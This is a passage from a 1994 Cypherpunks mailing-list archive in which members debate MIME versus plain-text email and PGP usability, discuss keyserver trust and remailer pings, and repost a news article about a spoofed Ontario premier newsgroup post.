parallel, in postscript and in Word format (or whatever) so that lots of people could read it and prepend an explanatory document describing what the contents were -- some MIME readers will then display the attachment as an icon that you could then drag and drop into an appropriate viewer or printer. MIME is a general infrastructural mechanism for this and more. Its a bit of a toy right now on mailing lists because too many people lack MIME capable readers, but in environments where MIME is universally used it has already taken over and is a fundamental part of the way people do business. Once you've seen a secretary who barely understands anything drag a spreadsheet into a mail message and send it to someone on another continent who, equally ignorantly, just double-clicks on it and then has the spreadsheet program launch, you will understand what the point of MIME is. Without a MIME capable reader you can't do any of these things, of course. Even with one, you might not initially see any benefits because you might be using a mediocre reader or you might not have any correspondants who do snazzy things. However, MIME is rapidly being deployed and is going to be universal within a couple of years. Its not just a silly way to sign your name with a GIF. > Like it or not, we are now in a mostly-ASCII Net environment. We are in a mostly graphical net environment. Its been seven years since I used a machine (for more than a few minutes) that didn't have a bitmapped display. The Macintosh you are sitting in front of right now knows nothing about ASCII -- its a bitmapped display, not a character generator based display, and it can show whatever font you like. What you are actually saying is that you use a primitive interface into your network service provider rather than, say, SLIP or PPP, and that because of this you are restricted to dumb-terminal type operations on a computer that is far more capable than that. Were I you, I'd get PPP account from Netcom and a POP based mailer to handle your mail reading directly on your Mac. You will no longer have to bitch about downloading your mail to the mac to decrypt it -- you will be able to just drag and drop mail into PGP with the right tools. You won't have to worry about MIME with the right package, either. > The "Display Postscript" standard was an attempt to bootstrap the > world to a new standard for document display, and it failed. Display postscript was for windowing systems. It had nothing to do with document displays per se. I can view postscript just as easily here on my workstation as ASCII. Display postscript was not a document viewer technology but a way of building things like NeXTStep, which did indeed fail -- but thats because X won, and X is in wide use. Perry From jrochkin at cs.oberlin.edu Thu Dec 15 14:54:56 1994 From: jrochkin at cs.oberlin.edu (Jonathan Rochkind) Date: Thu, 15 Dec 94 14:54:56 PST Subject: McCoy is Right! New Mail Format to Start Now. Message-ID: At 5:27 PM 12/15/94, Timothy C. May wrote: >For example, I could spend some number of hours switching from my >current mail progam (elm) to some other editor which perhaps >better-supported the MIME messages seen here. But if all I got for >several hours of using, learning, and becoming comfortable with, say, >"pine," was the ability to see an _italicized_ word, or a word in >Cyrillic, then I would consider this a poor ROI. Well, I certainly agree with you, and I expect most everyone else does too. No one expects anyone to spend lots of time with minimal returns on that time. But the reason I think you are meeting so much animosity is because there are lots of people here who think MIME is the solution to making encryption easier to use. Whether or not Joe Random User switches to a MIME compliant app so he can see italicized words is irrelevant. But what _is_ relevant is whether Joe Programmer writes his mail reader to be MIME compliant, and specifically, writes it to appropriately deal with the about-to-be-standardized PGP types. We all agree that it's currently much too hard to deal with PGP on a regular basis, for most people. Some people are satisfied with the tools they have, but the vast majority of people either don't have access to those tools, or dont' think the available tools are sufficient. It's not currently easy to use PGP on a regular basis, and this is a big problem. A lot of people are convinced that MIME is the solution to this problem, and rightly so in my opinion. And they take many of your comments to be counter productive, in that we "should" be encouraging MIME, and we "should" be excited about MIMEs possibilities in this area. And of course people like MIME for other reasons too. But I don't think anyone is trying to blame Tim C. May, or anyone else, for thinking the current tools suck, and for not wanting to deal with MIME with the current tools. Everything is a cost benefit equation, and it's up to you to weigh the costs and benefits. But people see MIME as exciting technology, which if properly implemented, can do lots of really cool things. Not the least of which is make it easy/possible for mailers to deal with PGP correctly. Steve Dorner, who writes Eudora, is working on a new version that will interact with PGP transparently. He's been talking about it a bit on the MCIP list, and I'm very excited about it. It should make using PGP with Eudora incredibly easy. And he's relying on MIME, and the incipient PGP and encryption MIME standards, to make it work. From claborne at microcosm.sandiegoca.NCR.COM Thu Dec 15 15:08:22 1994 From: claborne at microcosm.sandiegoca.NCR.COM (Claborne, Chris) Date: Thu, 15 Dec 94 15:08:22 PST Subject: PGP Docs in HTML??? Message-ID: <2EF0C052@microcosm.SanDiegoCA.NCR.COM> I am currently working on turning the PGP documentation into a HTML document with clickable table of contents.... Someone has probably already done this. I am doing it here for my "Security" home page at AT&T GIS San Diego, mainly for educational purposes. Do you know of anyone that has done this? If not I can post somewhere when I complete. It's a big task. ... __o .. -\<, chris.claborne at sandiegoca.attgis.com ...(*)/(*). CI$: 76340.2422 PGP Pub Key fingerprint = A8 FA 55 92 23 20 72 69 52 AB 64 CC C7 D9 4F CA Avail on Pub Key server. PGP-encrypted e-mail welcome! From db at Tadpole.COM Thu Dec 15 15:24:23 1994 From: db at Tadpole.COM (Doug Barnes) Date: Thu, 15 Dec 94 15:24:23 PST Subject: McCoy is Right! New Mail Format to Start Now. In-Reply-To: <199412152227.OAA05100@netcom12.netcom.com> Message-ID: <9412152323.AA01634@tadpole.tadpole.com> I actuallly sympathize with Tim's position and Eric's earlier comments about adopting tools as as function of ROI. I often experience somethign similar wiht "potentially faster but non-deterministic time solutions," vs. "probably slower but deterministic time solutions." That said, I think that MIME, for all its implementation difficulties, is going to be an attractor, if for no other reason that the fact that there is an increasing demand for _something_ to encapsulate all the divergent stuff that people want to push and pull across the net, and MIME is the standard for doing this. For instance, it is used to encasulate html, and some advocate an expansion of its use in conjunction with the web. [Note that this does not make the various cock-ups that can occur in conjuction with its expanding use in e-mail any less annoying.] I'm also curious what James is using on his Sun, as Sun's mailtool (at least the version I have) is pre-MIME, but MIME-ish, and can choke in amusing ways on MIME messages. Doug From maher at kauai.UCSD.EDU Thu Dec 15 15:28:23 1994 From: maher at kauai.UCSD.EDU (Kevin E. Maher) Date: Thu, 15 Dec 94 15:28:23 PST Subject: PGP Docs in HTML??? In-Reply-To: <2EF0C052@microcosm.SanDiegoCA.NCR.COM> Message-ID: <9412152327.AA06328@kauai.UCSD.EDU> -----BEGIN PGP SIGNED MESSAGE----- > Do you know of anyone that has done this? If not I can post somewhere >when I complete. It's a big task. Somebody's done it: http://www.pegasus.esprit.ec.org/people/arne/pgp.html Kevin - -- Kevin Maher Programmer/Analyst kmaher at ucsd.edu Institute of Geophysics and Planetary Physics (619) 534-9828 Scripps Institution of Oceanography, UC San Diego -----BEGIN PGP SIGNATURE----- Version: 2.6 iQCVAwUBLvDQvxhpvzXKrHyBAQHe2AQArp6EBwitsuKtzdR3ugqCuokPw2UYh8h+ eITGoZOXd79yrKSXS/wvfys+dSWAiqTVKcNgWT1sR2wJkyFLGn3L6LRLfJsnhsQG glUUizdIrHb0qxIP36eHTduH9YDN0ahlLFIABuOPLGjyxMXw0jyhH/oKf/3tj6Ih bT+rvsIXaXA= =vYPD -----END PGP SIGNATURE----- From jamesd at netcom.com Thu Dec 15 15:35:31 1994 From: jamesd at netcom.com (James A. Donald) Date: Thu, 15 Dec 94 15:35:31 PST Subject: McCoy is Right! New Mail Format to Start Now. In-Reply-To: <9412152226.AA01486@snark.imsi.com> Message-ID: <199412152333.PAA28121@netcom10.netcom.com> James A. Donald says: > > No two mimes seem to entirely agree what mime format is. Perry E. Metzger writes > Well, the specification is pretty clear. Its pretty simple stuff, > actually, and remarkably well designed. Quite true. But the technology has not achieved the critical mass that you need for most software producers to support it properly. Sun does not support it, Microsoft screws it up royally last time I looked. Thus mime is, as Tim earlier complained, bleeding edge. Netscape is leading edge. Obviously mime is the right solution for Email in the long run. Equally obviously, none of the tools that I prefer to use, on any of the systems that I have connected to the internet, handle mime in a way that I am willing to tolerate. -- --------------------------------------------------------------------- We have the right to defend ourselves and our property, because of the kind of animals that we James A. Donald are. True law derives from this right, not from the arbitrary power of the omnipotent state. jamesd at netcom.com From abostick at netcom.com Thu Dec 15 15:43:24 1994 From: abostick at netcom.com (Alan Bostick) Date: Thu, 15 Dec 94 15:43:24 PST Subject: Articles on Adelman and E=mc(2) In-Reply-To: <9412131605.AA12267@snark.imsi.com> Message-ID: <44uxkyczB8-P073yn@netcom.com> -----BEGIN PGP SIGNED MESSAGE----- In article <9412131605.AA12267 at snark.imsi.com>, you wrote: > > The article contains a serious inaccuracy -- it credits Adleman with > having invented the term "Computer Virus", when, in fact, it was > probably John Brunner in his novel "The Shockwave Rider" over ten > years earlier. It also inaccurately credits one of his students with > developing the first one as a test, when in fact they existed for a > long time before. > > .pm > The notion of a computer virus predates THE SHOCKWAVE RIDER. Gregory Benford used the notion in a short story published in AMAZING STORIES in 1973 or 1974. It was an idea mentioned in passing in a story taking place in a mining town in Antarctica. (Sorry, but I can't provide any more bibliographic data than that; I'm relying strictly on memory.) Benford definitely used the word "virus" to describe how the thing reproduces. In 1975 (the same year that THE SHOCKWAVE RIDER came out) Laser Books published the notoriously bad SEEDS OF CHANGE, by Thomas F. Monteleone. Monteleone has the Evial Computer That Rules The World brought down by feeding it something called a "Benford program," i.e. a virus. I couldn't say for sure whether the idea of computer viruses was original to Benford or not. He is a theoretical plasma physicist who in his misspent youth worked at Lawrence Livermore National Laboratory in the weapons program. It is possible that he worked on numerical modeling of plasmas in a secure computing environment, and that viruses were part of the threat models of the Livermore computer security people. If he did invent the idea, then he has a lot to answer for. . . . | For me, to be a feminist is to answer the Alan Bostick | question "Are women human?" with a yes. abostick at netcom.com | finger for PGP public key | Katha Pollitt, REASONABLE CREATURES Key fingerprint: | 50 22 FB 46 41 A3 17 9D F7 33 FF E1 4E 1C 89 79 +legal_kludge=off -----BEGIN PGP SIGNATURE----- Version: 2.6.1 iQB1AgUBLu+FYuVevBgtmhnpAQGkGQL/ex3L21RwpndybSOd3lWx1nfqkkbHHKce jWDWmPZsI4njPtcApInPRw4A6/SUwkwBbJqNA0cK78MBeij1mn9pCwuDiviHNeLO ZMBPy9csz8Lyr8N7RO9CZ5o4cgolGGF2 =7PCk -----END PGP SIGNATURE----- From perry at imsi.com Thu Dec 15 15:43:32 1994 From: perry at imsi.com (Perry E. Metzger) Date: Thu, 15 Dec 94 15:43:32 PST Subject: McCoy is Right! New Mail Format to Start Now. In-Reply-To: <199412152333.PAA28121@netcom10.netcom.com> Message-ID: <9412152342.AA01611@snark.imsi.com> James A. Donald says: > Thus mime is, as Tim earlier complained, bleeding edge. > > Netscape is leading edge. Please note that MIME is an encapsulation methodology -- ZMail, Eudora, AMS and others are implementations. Netscape is an implementation. HTML and HTTP are the things that it implements (along with some other protocols). Just keep in mind the distinction between a standard and the implementations of that standard -- they are different. Perry From dave at esi.COM.AU Thu Dec 15 16:11:22 1994 From: dave at esi.COM.AU (Dave Horsfall) Date: Thu, 15 Dec 94 16:11:22 PST Subject: Zimmermann Defense Fund Appeal In-Reply-To: <9412160924.ZM13302@wiley.sydney.sgi.com> Message-ID: On Fri, 16 Dec 1994, Ian Farquhar wrote: > Very true. Try as I might, I cannot think of any legal system in the > world where a large amount of money cannot buy justice... or injustice. With the possible exception of some indigenous peoples, such as the Australian aborigines. -- Dave Horsfall (VK2KFU) | dave at esi.com.au | VK2KFU @ VK2AAB.NSW.AUS.OC | PGP 2.6 Opinions expressed are mine. | E7 FE 97 88 E5 02 3C AE 9C 8C 54 5B 9A D4 A0 CD From jdwilson at gold.chem.hawaii.edu Thu Dec 15 16:28:33 1994 From: jdwilson at gold.chem.hawaii.edu (NetSurfer) Date: Thu, 15 Dec 94 16:28:33 PST Subject: FV & PGP (was Re: First Virtual email security) Message-ID: <199412160033.TAA07984@bb.hks.net> -----BEGIN PGP SIGNED MESSAGE----- Thanks for the clarification - I missed that part. - --- [This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.] -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Gratis auto-signing service iQBFAwUBLvDgUCoZzwIn1bdtAQEyiQF/edj0wFAtJz50I9VQpRFpz7pMFKL6ffIo /QiLNqjus8bKRStqz5hr2obb8w7OoBlw =JFF+ -----END PGP SIGNATURE----- From lmccarth at ducie.cs.umass.edu Thu Dec 15 16:31:52 1994 From: lmccarth at ducie.cs.umass.edu (L. McCarthy) Date: Thu, 15 Dec 94 16:31:52 PST Subject: Many-Hop Remailer Ping Messages Message-ID: <199412160036.TAA07996@bb.hks.net> -----BEGIN PGP SIGNED MESSAGE----- - -----BEGIN PGP SIGNED MESSAGE----- Some agent periodically sends out several hundred line remailer ping messages (unencrypted) with many hops planned; a sample is included below. It would be nice if the parties responsible would remove my address (and, for example, Eric Frias' address and the leri address) since I'm not operating a remailer at this address any longer. Adding in the newer remailers might be a wise move if this is supposed to produce results representative of the entire remailer bramble. In the immortal words of Kibo, "PLEASE UPDATE YOUR COSMIC PARAMETERS." Thanks. - - -L. Futplex McCarthy Forwarded message: > To: lmccarth at ducie.cs.umass.edu > > :: > Anon-To: remailer at ideath.goldenbear.com > > :: > Anon-To: remail at leri.edu > > :: > Anon-To: efrias at csugrad.cs.vt.edu [many lines omitted...] - -----BEGIN PGP SIGNATURE----- Version: 2.6.1 iQCVAwUBLvDfr2f7YYibNzjpAQEIygP/cQrEeELKjsqFjzEj7vD7R0/NfZQ52H8G WhHF+11aQfYN+XJYKv/Ah8/ifyxHNhwjaidk3GS3IEkVganOUv7Ay3ax4HsZiR/J vkSKL0tW7YB2ZM4faL+Z4y71P6190VzERu4Wsuku89KLxEhGvSLGSZQOQamK3LgG 938B9PolQmg= =gyVz - -----END PGP SIGNATURE----- - --- [This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.] -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Gratis auto-signing service iQBFAwUBLvDg/ioZzwIn1bdtAQG6mgF+IxsKDp5IhQnSGEivFBuXBhX7lS44Unvs DKzub0n5Zsu/D1cSAAKGoE8zYUXQq4mi =U3vB -----END PGP SIGNATURE----- From sdw at lig.net Thu Dec 15 16:46:37 1994 From: sdw at lig.net (Stephen D. Williams) Date: Thu, 15 Dec 94 16:46:37 PST Subject: Algebra In-Reply-To: <9412152037.AA01349@snark.imsi.com> Message-ID: This really reminds me that I'd like to start gathering short discourses on various subjects to make a WWW educational library/courses. It has everything you'd need and there are lots of things even I'd like to write about. I'm really thinking of a contrib learning library. Does anyone know if someone has started this yet? If not, I'll organize a structure, contrib guidelines, WWW server that allows contrib, voting (on best ways to learn something), etc. and try to think up a domain that isn't taken. I'll by necessity have to set it up and let it run since I'm already overloaded with work and family. My feeling is that there is lots of stuff out there already and that it needs to be organized. Not overly so as traditional schooling is, but in a way that allows organic learning and search for what you may need to learn. I'll start it on my web server and see about mirroring on my friends systems (who have faster connections). And now, the reason I decided to dump this here, I'd like to ask permission to include discourses like the one just given. comments please! selfed.com or selfedu.com or maybe self-ed.com????? > Tom Jones says: > > Dear Eric and Cypherpunks, > > > > So, how is division defined in Fp? > > Being an old fogey, I still refer to the field formed by the integers > modulo a prime by a gothic capital Z sub p. > > In Z_p, you define division as the inverse of multiplcation, just as > in real life. One easy way to do this is to note that every number in > a field like this has a multiplicative inverse. Multiplying by the > multiplicative inverse of a number is the same as dividing by the > number. > > For the hell of it, make yourself a multiplication table for Z_5. Its > a quick exercise. Note that every number in Z_5 other than zero > possesses a multiplicative inverse -- that is, a number that it can be > multiplied against to yield 1. Step back and then observe, > experimentally, that for any three positive numbers in Z_5 A, B and C > such that A*B=C, that C*(B^-1)=A. One can, of course, prove that this > is the case rigorously... > > Perry > -- Stephen D. Williams 25Feb1965 VW,OH sdw at lig.net http://www.lig.net/~sdw Senior Consultant 510.503.9227 CA Page 513.496.5223 OH Page BA Aug94-Dec95 OO R&D AI:NN/ES crypto By Buggy: 2464 Rosina Dr., Miamisburg, OH 45342-6430 Firewalls/WWW servers ICBM: 39 38 34N 84 17 12W home, 37 58 41N 122 01 48W work Pres.: Concinnous Consulting,Inc.;SDW Systems;Local Internet Gateway Co.29Nov94 From explorer at iastate.edu Thu Dec 15 17:00:04 1994 From: explorer at iastate.edu (Michael Graff) Date: Thu, 15 Dec 94 17:00:04 PST Subject: No Subject In-Reply-To: Message-ID: <9412160059.AA25877@du81-13.cc.iastate.edu> >Why is it possible for someone other than ME to add MY key to a keyserver? >I realize that at some point (perhaps only the first time you submit a >key?), there has to be some trust model employed, but it seems like this >anyone-can-submit-anyone-else's-key situation offers a very obvious attack: >anyone could propagate bogus keys across the net by just generating bogus >keys with someone else's email/name on them, leading to massive >impersonation problems. Yes, there are such possibilitied. >Maybe I'm missing something obvious, but it seems like there should be a >more rigorous method available to, and employed by, keyserver operators for >verifying someone's identity before accepting a key submitted (supposedly) >by them. Shouldn't the key submission msg itself at minimum be required to >be contained within a signed msg from someone with enough "nearness" in >trust levels from some trusted introducer known to the keyserver op? I >thought this sort of situation was precisely the reason for the trust level >system in PGP in the first place. >This may be a can of worms (or not), but if cpunks require fairly decent >methods for verifying the identities of people who want to trade keys with >them personally, then it seems keyservers should require at LEAST that >level of verification (or better). Sure. Are you offering to do the coding? >I'd like to CLEAR/REMOVE ALL keys from ALL keyservers that are: > - attributed to me by others (without my knowledge) > - added by others (unknown to me) > - purporting to have been generated by me) >and start with a tabula rasa. Maybe in a few weeks, once all these (what I >consider to be) bogus keys are GONE, I can add my actual key to a >keyserver. Until someone writes code to deal with owner-submission (or whatever) you're SOL. Even if all the operators were to delete all of your keys, someone would eventually mail their entire ring to a server, and those bogus keys would be back up again. You mentioned that you didn't keep your secret key for one of your now-defunct keys. Why not? Are the servers supposed to clean up after you now too? >There doesn't seem to be any elegant mechanism available for doing this >yet, but I'm ready to be educated on this point. Any comments? Do you know how to code in Perl? Code submissions welcome. --Michael -- Michael Graff Iowa State University Computation Center Project Vincent 215 Durham voice: (515) 294-4994 explorer at iastate.edu Ames, IA 50011 fax: (515) 294-1717 gg.mlg at isumvs.bitnet From anonymous-remailer at shell.portal.com Thu Dec 15 17:09:47 1994 From: anonymous-remailer at shell.portal.com (anonymous-remailer at shell.portal.com) Date: Thu, 15 Dec 94 17:09:47 PST Subject: MIME Message-ID: <199412160109.RAA04201@jobe.shell.portal.com> > Once you've seen a secretary who barely understands anything drag a > spreadsheet into a mail message and send it to someone on another > continent who, equally ignorantly, just double-clicks on it and then > has the spreadsheet program launch, you will understand what the point > of MIME is. Is this what the big deal about MIME is? Damn, I've been doing this (cutting and pasting spreadsheets, launching them by double clicking) for years now on Mac's and PC's running Windows. Heck, under NeXTSTEP as well. From jonathon at izanagi.sbi.com Thu Dec 15 17:32:17 1994 From: jonathon at izanagi.sbi.com (Jonathon Fletcher) Date: Thu, 15 Dec 94 17:32:17 PST Subject: McCoy is Right! New Mail Format to Start Now. In-Reply-To: <199412152012.MAA28503@netcom2.netcom.com> Message-ID: On Thu, 15 Dec 1994, Timothy C. May wrote: > > I see two "stable attractors" for text/graphics/multimedia/etc. sent > over the Net: > > 1. Straight text, ASCII, 80 column format. All systems can handle > this, all mailers and newsreaders can handle it, it's what the Usenet > is essentially based upon, and it gets the job done. It meets the > needs of 95% of us for 95% of our needs. > > 2. The Web, for graphics, images, etc. This will be the next main > stable attractor, deployed on many platforms. (I'm assuming the debate > here about Netscape standards does not imply much of a fragmentation, > that Mosaic, Netscape, MacWeb, etc., will all basically be able to > display Web pages in much the same way.) > Okay, I'll go with that. I'd just like to point out that http (transport for documents serverd on the web) uses mime. That's how your browser knows something is html, or a picture of some format, or postscript. find a web server (pick one) and telnet to it: % telnet my.web.server 80 enter the following line and press return *twice* HEAD / HTTP/1.0 (you need the second line because the server is expecting a mime header from you - ended by a blank line). You'll get some answer like: HTTP/1.0 200 OK Date: Friday, 16-Dec-94 01:09:44 GMT Server: NCSA/1.3 MIME-version: 1.0 Content-type: text/html Last-modified: Tuesday, 06-Dec-94 06:10:37 GMT Content-length: 1067 That's the server's answer to your query - one mime header (the http HEAD request asks for info about a document). If you have a mailer that doesn't automagically verify signatures and pack and unpack pgp messages it's a pain (I know tim will agree with this). If you have a mailer that can't pack and unpack mime then it's a pain too. Just because your mailer doesn't support it doesn't mean that mime (or email privacy !) is a bad thing. -Jon PS: for those with macs or pcs or unix machines don't have mime. please take a look at mpack - might find it usefull. ftp://ftp.andrew.cmu.edu/pub/mpack -- j.fletcher at stirling.ac.uk "opinions expressed are those of the author and not necessarily those of anyone or anything else." From amanda at intercon.com Thu Dec 15 17:37:16 1994 From: amanda at intercon.com (Amanda Walker) Date: Thu, 15 Dec 94 17:37:16 PST Subject: McCoy is Right! New Mail Format to Start Now. Message-ID: <199412160136.UAA11193@intercon.com> > But this isn't 15 years ago, and I daresay there isn't a _single_ > subscriber to the Cypherpunks list using a VIC-20 or anything remotely > similar. Of the 600 or so subscribers, and certainly of the 100-200 > involved posters, I would bet that essentially all of them can display > ASCII text on an 80-column screen. ... when they're at their desk. There has been an explosion, however, of non-80-column-capable devices on which people want to read their email. Alphanumeric pagers, Handheld PDAs, palmtop computers, etc. Give me a radio modem with reasonable service coverage, and I'd want to read at least some kinds of mail on my Newton (about 32-48 characters across the display). In fact, the ability to display graphics is becoming universal in areas where 80 columns have been tossed aside. Very few people use actual terminals any more. I'd be amazed if any more than 5-10% of the readership of this group (and the Internet at large) were using anything but a graphics display, even if it's emulating a VT100. I should stop now, though. I feel the urge to bring up Hollerith cards and keypunches again :). Amanda Walker InterCon Systems Corporation From perry at imsi.com Thu Dec 15 18:17:25 1994 From: perry at imsi.com (Perry E. Metzger) Date: Thu, 15 Dec 94 18:17:25 PST Subject: MIME In-Reply-To: <199412160109.RAA04201@jobe.shell.portal.com> Message-ID: <9412160217.AA01737@snark.imsi.com> Mr. Anonymous does well to remain anonymous. His comments are embarassing to him. Naturally the idea is old -- I explicitly mentioned NeXT mail, didn't I? The point is that this is an open, non-proprietary, and STANDARDIZED framework for doing arbitrary recursive encapsulation of data in EMail. Perry anonymous-remailer at shell.portal.com says: > > Once you've seen a secretary who barely understands anything drag a > > spreadsheet into a mail message and send it to someone on another > > continent who, equally ignorantly, just double-clicks on it and then > > has the spreadsheet program launch, you will understand what the point > > of MIME is. > > Is this what the big deal about MIME is? > > Damn, I've been doing this (cutting and pasting spreadsheets, > launching them by double clicking) for years now on Mac's and PC's > running Windows. Heck, under NeXTSTEP as well. > From jonathon at izanagi.sbi.com Thu Dec 15 18:19:46 1994 From: jonathon at izanagi.sbi.com (Jonathon Fletcher) Date: Thu, 15 Dec 94 18:19:46 PST Subject: McCoy is Right! New Mail Format to Start Now. In-Reply-To: <199412152216.OAA19537@netcom10.netcom.com> Message-ID: On Thu, 15 Dec 1994, James A. Donald wrote: > Perry E. Metzger writes > > The point, Tim, is that you keep conflating a bad MIME read that you > > happen to use with the notion that MIME is bad. > > No two mimes seem to entirely agree what mime format is. > > I use Sun's stuff. It is a pile of stinking shit. > > Sure, mime would be great if everyone had a great Mime > and every diverse system with every diverse mime > interpreter all worked and they all worked in the same > way. > There is only ONE MIME - it's in the rfc (I've forgotten the number). If it's the same as the rfc - it's MIME. if it ain't then it aint MIME. The sun stuff is a good example of how bad it can get. But it's not MIME. not mailtool anyway. It is a stinking pile of [insert expletive here]. But it's not MIME. -Jon -- j.fletcher at stirling.ac.uk "opinions are my own. not necessarily those of anyone or aything else" From werewolf at io.org Thu Dec 15 18:42:28 1994 From: werewolf at io.org (Mark Terka) Date: Thu, 15 Dec 94 18:42:28 PST Subject: The End of the Forged Post Controversey Message-ID: -----BEGIN PGP SIGNED MESSAGE----- It would appear that the "Bob Rae Forgery" had its standard 15 minutes of fame: From: eye at interlog.com (eye WEEKLY) Newsgroups: eye.news,ont.general,alt.internet.media-coverage Subject: EYE.NET: Mike Harris -- Roasted Alive Followup-To: eye.general,ont.general,alt.internet.media-coverage Date: 14 Dec 1994 11:00:20 -0500 Organization: eye -- Toronto's Arts Newspaper Lines: 160 Approved: eye at interlog.com Message-ID: <3cn4qk$ec0 at gold.interlog.com> NNTP-Posting-Host: gold.interlog.com Summary: Ontario PC leader pulls net.related bonehead political stunt Xref: io.org eye.news:307 ont.general:20751 alt.internet.media-coverage:2470 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ eye WEEKLY December 15 1994 Toronto's arts newspaper .....free every Thursday ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ EYE.NET EYE.NET MIKE HARRIS: ROASTED ALIVE Clueless PC leader mercilessly flamed for net-related political stunt by K.K. CAMPBELL On Dec 8, provincial PC leader Mike Harris stood in the Legislature and introduced a copy of a post to the newsgroup ont.general -- a public forum where anything of general interest to Ontarians is discussed. The post in question was signed "Bob Rae." It talked about the sexual orientation of Marion Boyd, the Karla Homolka case, and a few other things. Harris wasn't claiming Rae actually wrote it, he was suggesting it was proof of a serious "security violation" in government computer systems. Simulataneously, the PCS issued a press release entitled "Our Premier: Roadkill on the Information Highway." We regularly warn Our Faithful Readers about eyeNET's Rule#1: When strangers approach wielding the "highway metaphor," run. Do not speak with them. Do not make eye contact. Last week, eyeNET predicted many new and entertaining adventures could result from Ontario's premier getting online. We expected the shenanigans would come from anonymous net.weenies and assorted loons, not Mike Harris. ARTIFICIAL BOB It began innocently on Sunday Dec 3, at 1:22:41 a.m. (EST), when an anonymous individual posted a message called "Greetings to People of Ontario's Information Highway" to ont.general . It was faked so the "From:" line said "premier at govonca.gov.on.ca", Rae's office. Ontarians read it. Ontarians ignored it. The general response was best summed up by Toronto's Val Dodge (val at io.org), who wrote: "Am I the only one getting tired of [these spoof posts]? OK, the first couple were funny, but this is getting really tedious." No one thought it was from Rae. No one thought it was from "hackers invading government computers." Netters just looked at the PATH line and could see the post worked its way to Ontario from a California computer. On top of that, in the header it plainly says: "This message is NOT from the person listed in the from line. It is from an automated software remailing service..." Fake posts are part of net.life, but this one wasn't even a "forgery" (a real attempt to pretend to be someone else), it was a "spoof" (an "imitation" no one is expected to believe). A parody. Hardly a "security violation," unless Harris thinks all political impersonators represent "security violations." What if terminally dense Americans thought impersonator Dana Carvey really _was_ George Bush? Oh my GAWD! Call the cops! Rae's staff had noticed the fake post. Like the rest of the net.community, they just ignored it. After all, even the stupidest elements of the net community hadn't been fooled... why worry? They didn't account for Mike Harris. Five days later Harris issued his now famous "Roadkill" press release which includes the line "Internet Bob: the hacker is hacked." PC press secretary, Peter Varney, told eye the Conservatives weren't trying to score political points. They sincerely thought this harmless post was a "threat to Ontario's security" -- though Varney couldn't explain why Harris attempted to grandstand. And it's exactly that attempt to make political points from the matter that most angers Ontario netters. Sensationalization and playing on the ignorance of the press (which was as rampant as ever). The PCs swear they never saw the very explicit disclaimer in the fake Rae post because the newsreader of the person who "slipped" them this oh-so-dangerous document edited out most header information. It's plausible -- many newsreaders chop stuff from headers (headers contain info to help direct and organize posts for ease of reading). But ignorance hardly excuses Harris. In our conversation, Varney, trying to save face, actually suggested the simple ability to make a spoof post (and fool Mike Harris, I guess) is still a "security threat." So what are they asking Rae to do about it? Call in the OPP and stormtroop around cyberspace? THE NET STRIKES BACK The net.community's responses in ont.general have been a virtually unanimous condemnation of Harris. Several threads (i.e., discussions) developed, the longest one entitled "MIKE HARRIS IS SLIME." It originated with Brampton's Evan Leibovitch (evan at telly.on.ca), who wrote he didn't blame the "impersonator" because "children will be children", but "the people who fed this item to Harris are absolute assholes... My respect for Harris and the Ontario PCs has just taken a nosedive, and I hope the scum who were behind this realize that they have scored *NO* political points for pulling this stunt." In another thread, Toronto's Jamie Mason (g1jmason at cdf.toronto.edu) wrote: "Anyone who has been on the net for more than about FIVE MINUTES would realize that the message was a forgery. Anyone who has been on the net for more that about TEN minutes wouldn't even take notice of the message." T. Kim Nguyen (kim at algorithmics.com) likened the Harris bluff to "the way he paraded the woman quitting her job to go on welfare last year. His antics of the last few weeks trying to make the NDP look bad have simply succeeded in showing how much of a ridiculous opportunist he is." GENUINE BOB Late Friday afternoon (Dec 9, 5:24 pm), the Premier of Ontario (premier at govonca.gov.on.ca) issued his first real post to ont.general. It was called "Thanks" and read, in its entirety: "Many thanks to those of you who flamed the PC pranksters. I knew when I went online that I would have to deal with fake posts and related chaff. That's the price of being on the Net. I'm not about to delete my account. I still want to hear from people with *real* concerns and *real* suggestions." Signed: "Bob*The Genuine Article*Rae" eye called the premier's office. They confirm it's real. The premier's office made it clear it won't launch any investigation as to where the parody post came from -- and for that it should be applauded. I've talked with many people who don't understand the net and when something they don't like happens they invariably respond: "I'm going to shut the Internet down!" The Rae team is doing it's best to fit into the net.community, not remake it. Varney, on the other hand, says the PCs will actively pursue anyone who "impersonates" Mike Harris online. FRESH ROADKILL! Oh no! Look! Just spotted in ont.general! A breach in PC security!! Alert! Alert! Call the newsmedia! On Dec 10, "Mike Harris" supposedly posted a missive called "Mike Harris Fights Back - Kiss My Ass Rae!" to the net. It reads, in part: "You listen here Rae, my sources informed me that your article was on the level. You sleazy NDP wimps are more than capable of resorting to cheap shots like this, so I thought I'd pin one on your grain-fed ass... DAMN I'm mad!!!" Signed: "Mike Harris, Progressive Consevative (sic) Party of Ontario." ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Retransmit freely in cyberspace Author holds standard copyright Issues of eye in archive gopher://interlog.com Coupla Mailing lists available http://www.interlog.com/eye eye at interlog.com "Break the Gutenberg Lock..." 416-971-8421 -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQEVAwUBLvD223BFBj7pSNyhAQElcwf/Yv79UuYHOa8YJHDpZGHp8GlmD7WpoddK HaUr/EHvGJdB18UaSX99lZtLVDErFdrgk1xVvXQbIYAeLFpd1SmxMDUAqKUjqcMJ 4zZbqR7hKS66D++MRCWE/JCrxyEcyQPGXDNEXRel4XQZBv83FKI6qsLTccLfYaQN zozSr7CLjvM7Fv877znvLYQ/wvcvBRO4B1yCbj++/ENP4o7xL/BXSeoWYMJcdcFO X+qTqNj4b3A1YU6Phc5ciTHy/UeOUAtyWDAXXDmswXAkwDPWBUT3f0twJcIzjiRP RzkYASYIa21DYxhiR89vWL7NfcfnLYj7YHuG3Rc83wZLaxMhNLPCKw== =RZZ8 -----END PGP SIGNATURE----- From jamesd at netcom.com Thu 